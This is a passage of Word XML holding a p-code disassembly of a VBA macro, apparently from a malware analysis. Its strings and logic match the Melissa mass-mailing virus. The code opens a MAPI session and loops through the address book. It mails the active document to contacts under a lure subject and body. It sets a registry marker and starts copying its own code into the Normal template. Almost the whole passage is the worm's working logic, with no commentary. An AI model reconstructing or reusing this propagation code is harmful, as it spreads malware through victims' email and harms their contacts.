    <w:p w14:paraId="2CC81E86" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1447C8AF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd Recipients </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EAAF6D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall Add 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6658B7DF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #22:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492C697" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD9943A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F185B32" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F7D1B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F5CE3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #23:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B2F68" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7396726F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0032 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB0FB5E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Gt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A8267B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D914BA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoSImplicit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFCE774" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld AddyBook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D483CB5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd AddressEntries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074DEE5C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd Count </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BDE39D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St oo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D1CD9C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C9AFC4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #24:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3968C0BB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">StartForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B68733" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld oo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6D6B06" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF8134" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">NextVar </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFC5EF6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #25:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D3F09D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0017 "Important Message From "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C28A6E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Application </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D457E2B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd UserName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E061A27" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Concat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B261E89" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606E5BD6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt Subject </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C61A6E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #26:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF0A0D6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0042 "Here is that document you asked for ... don't show anyone else ;-)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30571865" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184FAEB0" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt Body </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED612A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #27:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B57030" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9D9271" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd FullName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B07CAF3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15019436" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd Attachments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F9D7A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall Add 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E694490" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #28:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477809E0" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631FADBD" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall Send 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515923EB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #29:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C3DCAA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF54DFB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St Peep </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD896D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #30:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4DDC29" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">StartForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C03E843" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF2243C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50650017" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">NextVar </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC15A95" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #31:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBCD302" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DasMapiName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF7B524" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall Logoff 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CECEF81" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #32:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AD285E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F26568" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #33:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2916A8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x000E "... by Kwyjibo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3656F6A3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41408941" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x002C "HKEY_CURRENT_USER\Software\Microsoft\Office\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DE6BBC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0008 "Melissa?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D8056E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld System </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085529A7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemSt PrivateProfileString 0x0003 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462B933B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #34:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC14AE" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A720D50" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #35:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24756F16" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48335B3C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753FE822" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB94A4D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd VBProject </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72643FD1" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd VBComponents </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF11896" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Item 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E48D615" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B49C82F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #36:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489183C6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11790E76" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2C7BF0" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NormalTemplate </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019B9370" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd VBProject </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4873DCDE" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd VBComponents </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED1ECC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Item 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C3377F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A34F699" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #37:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE54844" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531215C5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA01D3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CountOfLines </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01850500" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St NTCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D8287" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #38:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7225515A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAEECF9" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC5C8EC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CountOfLines </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B9F5FB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St ADCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E558F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #39:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC50B58" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3450F1E1" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
